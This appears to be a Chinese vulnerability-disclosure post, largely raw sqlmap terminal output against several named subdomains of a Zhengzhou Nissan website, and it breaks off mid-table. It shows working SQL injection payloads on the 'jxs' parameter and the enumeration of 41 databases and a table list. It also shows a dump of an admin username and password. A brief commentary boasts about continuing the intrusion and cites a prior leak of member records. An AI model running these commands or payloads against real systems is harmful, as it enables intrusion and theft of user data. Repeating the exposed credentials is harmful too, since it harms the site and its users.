[22:43:30] [INFO] retrieved: "user_deprights","text"
[22:43:30] [INFO] retrieved: "realname","varchar(255)"
[22:43:35] [INFO] retrieved: "keyno","varchar(25)"
[22:43:36] [INFO] retrieved: "keypin","varchar(255)"
[22:43:36] [INFO] retrieved: "usekey","tinyint(1)"
[22:43:36] [INFO] retrieved: "jxs_uid","int(11)"
[22:43:37] [INFO] retrieved: "area_id","int(11)"
Database: zznissan                                                             
Table: car_user
[19 columns]
+----------------+------------------+
| Column         | Type             |
+----------------+------------------+
| addCount       | int(10) unsigned |
| addtime        | datetime         |
| area_id        | int(11)          |
| depid          | tinyint(2)       |
| groupid        | tinyint(2)       |
| id             | tinyint(5)       |
| ip             | varchar(255)     |
| jxs_uid        | int(11)          |
| keyno          | varchar(25)      |
| keypin         | varchar(255)     |
| operator_id    | int(11)          |
| password       | varchar(32)      |
| realname       | varchar(255)     |
| usekey         | tinyint(1)       |
| user_dep_id    | int(11)          |
| user_dep_name  | varchar(255)     |
| user_deprights | text             |
| userEmail      | varchar(50)      |
| username       | varchar(20)      |
+----------------+------------------+
[22:43:37] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hbjzmh.zznissan.com.cn'
[*] shutting down at 22:43:37
root@kailroot:~# sqlmap -u http://hbjzmh.zznissan.com.cn/map.php?jxs=541 --dump -T car_user -C "username,password" -D zznissan
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:44:48
[22:44:48] [INFO] resuming back-end DBMS 'mysql' 
[22:44:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=541' AND 5597=5597 AND 'Ywyd'='Ywyd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=541' AND (SELECT 1956 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(1956=1956,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zede'='Zede
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=541' OR SLEEP(5) AND 'akqX'='akqX
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=541' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x6c5074756e4f507a6664,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:44:49] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:44:49] [INFO] fetching columns 'password, username' for table 'car_user' in database 'zznissan'
[22:44:50] [INFO] the SQL query used returns 2 entries
[22:44:50] [INFO] retrieved: "username","varchar(20)"
[22:44:51] [INFO] retrieved: "password","varchar(32)"
[22:44:51] [INFO] fetching entries of column(s) 'password, username' for table 'car_user' in database 'zznissan'
[22:44:51] [INFO] the SQL query used returns 1 entries
[22:44:51] [INFO] retrieved: "admin","admin"
[22:44:51] [INFO] analyzing table dump for possible password hashes            
Database: zznissan
Table: car_user
[1 entry]
+----------+----------+
| username | password |
+----------+----------+
| admin    | admin    |
+----------+----------+
[22:44:51] [INFO] table 'zznissan.car_user' dumped to CSV file '/root/.sqlmap/output/hbjzmh.zznissan.com.cn/dump/zznissan/car_user.csv'
[22:44:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hbjzmh.zznissan.com.cn'
[*] shutting down at 22:44:51
root@kailroot:~#sqlmap -u http://dongguanhuizhan.zznissan.com.cn/map.php?jxs=181 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:46:19
[22:46:20] [INFO] testing connection to the target URL
[22:46:21] [INFO] testing if the target URL is stable
[22:46:21] [INFO] target URL is stable
[22:46:21] [INFO] testing if GET parameter 'jxs' is dynamic
[22:46:21] [INFO] confirming that GET parameter 'jxs' is dynamic
[22:46:22] [INFO] GET parameter 'jxs' is dynamic
[22:46:22] [INFO] heuristic (basic) test shows that GET parameter 'jxs' might be injectable (possible DBMS: 'MySQL')
[22:46:22] [INFO] heuristic (XSS) test shows that GET parameter 'jxs' might be vulnerable to XSS attacks
[22:46:22] [INFO] testing for SQL injection on GET parameter 'jxs'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[22:46:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:46:38] [WARNING] reflective value(s) found and filtering out
[22:46:44] [INFO] GET parameter 'jxs' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[22:46:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:46:45] [INFO] GET parameter 'jxs' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable 
[22:46:45] [INFO] testing 'MySQL inline queries'
[22:46:46] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[22:46:46] [WARNING] time-based comparison requires larger statistical model, please wait............
[22:46:56] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:46:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[22:46:57] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[22:46:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:46:57] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[22:46:58] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:46:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[22:47:04] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[22:47:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
[22:47:14] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
[22:47:20] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[22:47:25] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[22:47:39] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:47:39] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[22:47:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:48:01] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:48:12] [CRITICAL] unable to connect to the target URL or proxy
[22:48:42] [INFO] GET parameter 'jxs' seems to be 'MySQL >= 5.0.12 OR time-based blind' injectable 
[22:48:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:48:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:48:43] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:48:45] [INFO] target URL appears to have 17 columns in query
[22:48:51] [INFO] GET parameter 'jxs' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'jxs' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=181' AND 3162=3162 AND 'juNh'='juNh
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=181' AND (SELECT 8652 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(8652=8652,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kBIc'='kBIc
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=181' OR SLEEP(5) AND 'bZVJ'='bZVJ
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=181' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x6f4f635651624a744778,0x7176627a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:48:52] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:48:52] [INFO] fetching database names
[22:48:52] [INFO] the SQL query used returns 41 entries
[22:48:53] [INFO] retrieved: information_schema
[22:48:53] [INFO] retrieved: club_15
[22:48:54] [INFO] retrieved: ebuy
[22:48:54] [INFO] retrieved: ebuy1217
[22:48:55] [INFO] retrieved: events
[22:48:55] [INFO] retrieved: events_2014cgr
[22:48:56] [INFO] retrieved: events_2014five
[22:48:56] [INFO] retrieved: events_pickupStory
[22:48:56] [INFO] retrieved: ezznissan
[22:48:56] [INFO] retrieved: innodb
[22:48:57] [INFO] retrieved: jinzhiwen
[22:48:57] [INFO] retrieved: maintain
[22:49:07] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:49:08] [INFO] retrieved: mysql
[22:49:08] [INFO] retrieved: nissan
[22:49:09] [INFO] retrieved: nissan_2015cgr
[22:49:10] [INFO] retrieved: nissan_jxs
[22:49:10] [INFO] retrieved: nissan_patrol
[22:49:10] [INFO] retrieved: nissanmedia
[22:49:11] [INFO] retrieved: nissantest
[22:49:11] [INFO] retrieved: paladin
[22:49:11] [INFO] retrieved: paladinclub
[22:49:12] [INFO] retrieved: paladinclubtemp
[22:49:12] [INFO] retrieved: palaqi
[22:49:13] [INFO] retrieved: performance_schema
[22:49:13] [INFO] retrieved: specialcar
[22:49:13] [INFO] retrieved: test
[22:49:14] [INFO] retrieved: topic
[22:49:14] [INFO] retrieved: tower_15
[22:49:15] [INFO] retrieved: wqw_five
[22:49:15] [INFO] retrieved: wqw_mx6gc
[22:49:15] [INFO] retrieved: wqw_succk
[22:49:16] [INFO] retrieved: xuhui
[22:49:16] [INFO] retrieved: yaguan
[22:49:16] [INFO] retrieved: zznissan
[22:49:17] [INFO] retrieved: zznissan_eng
[22:49:17] [INFO] retrieved: zznissan_jnds
[22:49:18] [INFO] retrieved: zznissan_lms2015
[22:49:18] [INFO] retrieved: zznissan_mx6sj2015
[22:49:18] [INFO] retrieved: zznissan_mx6tg2015
[22:49:18] [INFO] retrieved: zznissan_pro
[22:49:19] [INFO] retrieved: zznissanbak
available databases [41]:                                                      
[*] club_15
[*] ebuy
[*] ebuy1217
[*] events
[*] events_2014cgr
[*] events_2014five
[*] events_pickupStory
[*] ezznissan
[*] information_schema
[*] innodb
[*] jinzhiwen
[*] maintain
[*] mysql
[*] nissan
[*] nissan_2015cgr
[*] nissan_jxs
[*] nissan_patrol
[*] nissanmedia
[*] nissantest
[*] paladin
[*] paladinclub
[*] paladinclubtemp
[*] palaqi
[*] performance_schema
[*] specialcar
[*] test
[*] topic
[*] tower_15
[*] wqw_five
[*] wqw_mx6gc
[*] wqw_succk
[*] xuhui
[*] yaguan
[*] zznissan
[*] zznissan_eng
[*] zznissan_jnds
[*] zznissan_lms2015
[*] zznissan_mx6sj2015
[*] zznissan_mx6tg2015
[*] zznissan_pro
[*] zznissanbak
[22:49:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/dongguanhuizhan.zznissan.com.cn'
[*] shutting down at 22:49:19
root@kailroot:~# sqlmap -u http://esxcc.zznissan.com.cn/map.php?jxs=149 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:51:25
[22:51:26] [INFO] testing connection to the target URL
[22:51:27] [INFO] testing if the target URL is stable
[22:51:27] [INFO] target URL is stable
[22:51:27] [INFO] testing if GET parameter 'jxs' is dynamic
[22:51:27] [INFO] confirming that GET parameter 'jxs' is dynamic
[22:51:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:51:38] [INFO] GET parameter 'jxs' is dynamic
[22:51:39] [INFO] heuristic (basic) test shows that GET parameter 'jxs' might be injectable (possible DBMS: 'MySQL')
[22:51:39] [INFO] heuristic (XSS) test shows that GET parameter 'jxs' might be vulnerable to XSS attacks
[22:51:39] [INFO] testing for SQL injection on GET parameter 'jxs'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[22:51:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:52:09] [WARNING] reflective value(s) found and filtering out
[22:52:10] [INFO] GET parameter 'jxs' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[22:52:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:52:16] [INFO] GET parameter 'jxs' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable 
[22:52:16] [INFO] testing 'MySQL inline queries'
[22:52:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[22:52:16] [WARNING] time-based comparison requires larger statistical model, please wait............
[22:52:25] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:52:30] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[22:52:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[22:52:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:52:37] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[22:52:37] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:52:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[22:52:43] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[22:52:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
[22:52:53] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
[22:52:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[22:53:04] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[22:53:14] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:53:14] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[22:53:25] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:53:36] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:53:47] [CRITICAL] unable to connect to the target URL or proxy
[22:53:57] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:54:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:54:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:54:30] [CRITICAL] unable to connect to the target URL or proxy
[22:54:30] [INFO] GET parameter 'jxs' seems to be 'MySQL >= 5.0.12 OR time-based blind' injectable 
[22:54:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:54:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:54:30] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:54:33] [INFO] target URL appears to have 17 columns in query
[22:54:33] [INFO] GET parameter 'jxs' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'jxs' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=149' AND 6651=6651 AND 'xxwO'='xxwO
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=149' AND (SELECT 4415 FROM(SELECT COUNT(*),CONCAT(0x7162786a71,(SELECT (ELT(4415=4415,1))),0x716b6a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vCSk'='vCSk
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=149' OR SLEEP(5) AND 'vSJt'='vSJt
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=149' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162786a71,0x7154484a566576724b62,0x716b6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:57:52] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:57:52] [INFO] fetching database names
[22:57:53] [INFO] the SQL query used returns 41 entries
[22:57:58] [INFO] retrieved: information_schema
[22:57:59] [INFO] retrieved: club_15
[22:57:59] [INFO] retrieved: ebuy
[22:57:59] [INFO] retrieved: ebuy1217
[22:58:00] [INFO] retrieved: events
[22:58:00] [INFO] retrieved: events_2014cgr
[22:58:05] [INFO] retrieved: events_2014five
[22:58:05] [INFO] retrieved: events_pickupStory
[22:58:06] [INFO] retrieved: ezznissan
[22:58:06] [INFO] retrieved: innodb
[22:58:06] [INFO] retrieved: jinzhiwen
[22:58:06] [INFO] retrieved: maintain
[22:58:07] [INFO] retrieved: mysql
[22:58:07] [INFO] retrieved: nissan
[22:58:07] [INFO] retrieved: nissan_2015cgr
[22:58:08] [INFO] retrieved: nissan_jxs
[22:58:08] [INFO] retrieved: nissan_patrol
[22:58:09] [INFO] retrieved: nissanmedia
[22:58:09] [INFO] retrieved: nissantest
[22:58:09] [INFO] retrieved: paladin
[22:58:09] [INFO] retrieved: paladinclub
[22:58:09] [INFO] retrieved: paladinclubtemp
[22:58:15] [INFO] retrieved: palaqi
[22:58:15] [INFO] retrieved: performance_schema
[22:58:16] [INFO] retrieved: specialcar
[22:58:16] [INFO] retrieved: test
[22:58:16] [INFO] retrieved: topic
[22:58:17] [INFO] retrieved: tower_15
[22:58:17] [INFO] retrieved: wqw_five
[22:58:22] [INFO] retrieved: wqw_mx6gc
[22:58:23] [INFO] retrieved: wqw_succk
[22:58:23] [INFO] retrieved: xuhui
[22:58:24] [INFO] retrieved: yaguan
[22:58:24] [INFO] retrieved: zznissan
[22:58:24] [INFO] retrieved: zznissan_eng
[22:58:24] [INFO] retrieved: zznissan_jnds
[22:58:24] [INFO] retrieved: zznissan_lms2015
[22:58:25] [INFO] retrieved: zznissan_mx6sj2015
[22:58:25] [INFO] retrieved: zznissan_mx6tg2015
[22:58:25] [INFO] retrieved: zznissan_pro
[22:58:26] [INFO] retrieved: zznissanbak
available databases [41]:                                                      
[*] club_15
[*] ebuy
[*] ebuy1217
[*] events
[*] events_2014cgr
[*] events_2014five
[*] events_pickupStory
[*] ezznissan
[*] information_schema
[*] innodb
[*] jinzhiwen
[*] maintain
[*] mysql
[*] nissan
[*] nissan_2015cgr
[*] nissan_jxs
[*] nissan_patrol
[*] nissanmedia
[*] nissantest
[*] paladin
[*] paladinclub
[*] paladinclubtemp
[*] palaqi
[*] performance_schema
[*] specialcar
[*] test
[*] topic
[*] tower_15
[*] wqw_five
[*] wqw_mx6gc
[*] wqw_succk
[*] xuhui
[*] yaguan
[*] zznissan
[*] zznissan_eng
[*] zznissan_jnds
[*] zznissan_lms2015
[*] zznissan_mx6sj2015
[*] zznissan_mx6tg2015
[*] zznissan_pro
[*] zznissanbak
[22:58:26] [INFO] fetched data logged to text files under '/root/.sqlmap/output/esxcc.zznissan.com.cn'
[*] shutting down at 22:58:26
root@kailroot:~# sqlmap -u http://dongguanhuizhan.zznissan.com.cn/map.php?jxs=181 --is-dba
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151024}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:59:09
[22:59:09] [INFO] resuming back-end DBMS 'mysql' 
[22:59:09] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jxs=181' AND 3162=3162 AND 'juNh'='juNh
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: jxs=181' AND (SELECT 8652 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(8652=8652,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kBIc'='kBIc
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: jxs=181' OR SLEEP(5) AND 'bZVJ'='bZVJ
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: jxs=181' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x6f4f635651624a744778,0x7176627a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
[22:59:10] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:59:10] [INFO] testing if current user is DBA
[22:59:10] [INFO] fetching current user
current user is DBA:    False
[22:59:10] [INFO] fetched data logged to text files under '/root/.sqlmap/output/dongguanhuizhan.zznissan.com.cn'
[*] shutting down at 22:59:10
root@kailroot:~#

$%J_0O9{L5CW6~0Q2N%)PRVL.png$

你觉得到这里还会完吗？ NONONO
某前辈提交的漏洞
WooYun: 郑州日产车主俱乐部SQL注入/359个表/200W会员信息/10W交易信息
看到了百万小数据10W的交易信息心血来潮
如下：
<code>root@kailroot:~# sqlmap -u http://hbjzmh.zznissan.com.cn/map.php?jxs=541 --tables -D zznissan
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:56:32
[22:56:33] [INFO] resuming back-end DBMS 'mysql'
[22:56:33] [INFO] testing connection to the target URL
[22:56:44] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 RLIKE (SELECT (CASE WHEN (7706=7706) THEN 8 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 AND (SELECT 5091 FROM(SELECT COUNT(*),CONCAT(0x717a787871,(SELECT (ELT(5091=5091,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=8 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-7685 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787871,0x4b62496a6f72524e5743,0x71786b6b71)--
---
[22:56:50] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:56:50] [INFO] fetching tables for database: 'zznissan'
[22:56:51] [INFO] the SQL query used returns 78 entries
[22:56:52] [INFO] retrieved: Recruitment
[22:56:53] [INFO] retrieved: act_article
[22:56:54] [INFO] retrieved: act_category
[22:56:55] [INFO] retrieved: article
[22:56:56] [INFO] retrieved: article1029
[22:56:57] [INFO] retrieved: brandpicture
[22:56:58] [INFO] retrieved: car_adimg
[22:56:58] [INFO] retrieved: car_brand
[22:57:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:57:15] [INFO] retrieved: car_carimg
[22:57:16] [INFO] retrieved: car_config
[22:57:16] [INFO] retrieved: car_detail
[22:57:17] [INFO] retrieved: car_drive
[22:57:19] [INFO] retrieved: car_drivehouse
[22:57:19] [INFO] retrieved: car_getinfo
[22:57:25] [INFO] retrieved: car_leixing
[22:57:26] [INFO] retrieved: car_models
[22:57:27] [INFO] retrieved: car_modelsinfo
[22:57:28] [INFO] retrieved: car_norms
[22:57:28] [INFO] retrieved: car_parameter
[22:57:34] [INFO] retrieved: car_seat
[22:57:35] [INFO] retrieved: car_series
[22:57:36] [INFO] retrieved: car_seriesinfo
[22:57:37] [INFO] retrieved: car_spec
[22:57:38] [INFO] retrieved: car_speed
[22:57:38] [INFO] retrieved: car_standard
[22:57:39] [INFO] retrieved: car_structure
[22:57:50] [INFO] retrieved: car_user
[22:57:50] [INFO] retrieved: car_userfun
[22:57:51] [INFO] retrieved: car_usergroup
[22:57:57] [INFO] retrieved: car_view
[22:57:58] [INFO] retrieved: category
[22:58:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:58:14] [INFO] retrieved: department
[22:58:24] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:58:26] [INFO] retrieved: displacement
[22:58:27] [INFO] retrieved: downcategory
[22:58:27] [INFO] retrieved: download
[22:58:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:58:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:58:55] [INFO] retrieved: dqcategory
[22:58:55] [INFO] retrieved: ecatalog
[22:59:01] [INFO] retrieved: energy_config
[22:59:02] [INFO] retrieved: energy_detail
[22:59:03] [INFO] retrieved: energy_images
[22:59:04] [INFO] retrieved: energy_memory
[22:59:05] [INFO] retrieved: energy_notice
[22:59:11] [INFO] retrieved: energy_parameter
[22:59:12] [INFO] retrieved: energy_picture
[22:59:23] [INFO] retrieved: energy_series
[22:59:29] [INFO] retrieved: energy_seriesinfo
[22:59:29] [INFO] retrieved: energy_video
[22:59:35] [INFO] retrieved: energy_view
[22:59:37] [INFO] retrieved: feedback
[22:59:37] [INFO] retrieved: get_active
[22:59:39] [INFO] retrieved: imagefile
[22:59:41] [INFO] retrieved: imgcategory
[22:59:42] [INFO] retrieved: jxs_getinfo
[22:59:42] [INFO] retrieved: login_record
[22:59:43] [INFO] retrieved: memory
[22:59:49] [INFO] retrieved: mobilepicture
[22:59:50] [INFO] retrieved: mx6_dealer
[22:59:56] [INFO] retrieved: mx6_testdrive
[23:00:06] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:00:13] [INFO] retrieved: mx6_user
[23:00:13] [INFO] retrieved: picture
[23:00:14] [INFO] retrieved: price
[23:00:15] [INFO] retrieved: purecategory
[23:00:22] [INFO] retrieved: puregoods
[23:00:22] [INFO] retrieved: rencai
[23:00:23] [INFO] retrieved: service
[23:00:24] [INFO] retrieved: service_bak
[23:00:31] [INFO] retrieved: sessions
[23:00:32] [INFO] retrieved: survey
[23:00:38] [INFO] retrieved: telents
[23:00:47] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:00:49] [INFO] retrieved: topic
[23:00:50] [INFO] retrieved: user
[23:00:56] [INFO] retrieved: userfun
[23:00:57] [INFO] retrieved: usergroup
[23:00:58] [INFO] retrieved: view_Carprice
[23:00:59] [INFO] retrieved: view_models
[23:01:05] [INFO] retrieved: view_models_test
[23:01:06] [INFO] retrieved: view_parameter
[23:01:07] [INFO] retrieved: zhaopin
Database: zznissan
[78 tables]
+-------------------+
| Recruitment |
| user |
| act_article |
| act_category |
| article |
| article1029 |
| brandpicture |
| car_adimg |
| car_brand |
| car_carimg |
| car_config |
| car_detail |
| car_drive |
| car_drivehouse |
| car_getinfo |
| car_leixing |
| car_models |
| car_modelsinfo |
| car_norms |
| car_parameter |
| car_seat |
| car_series |
| car_seriesinfo |
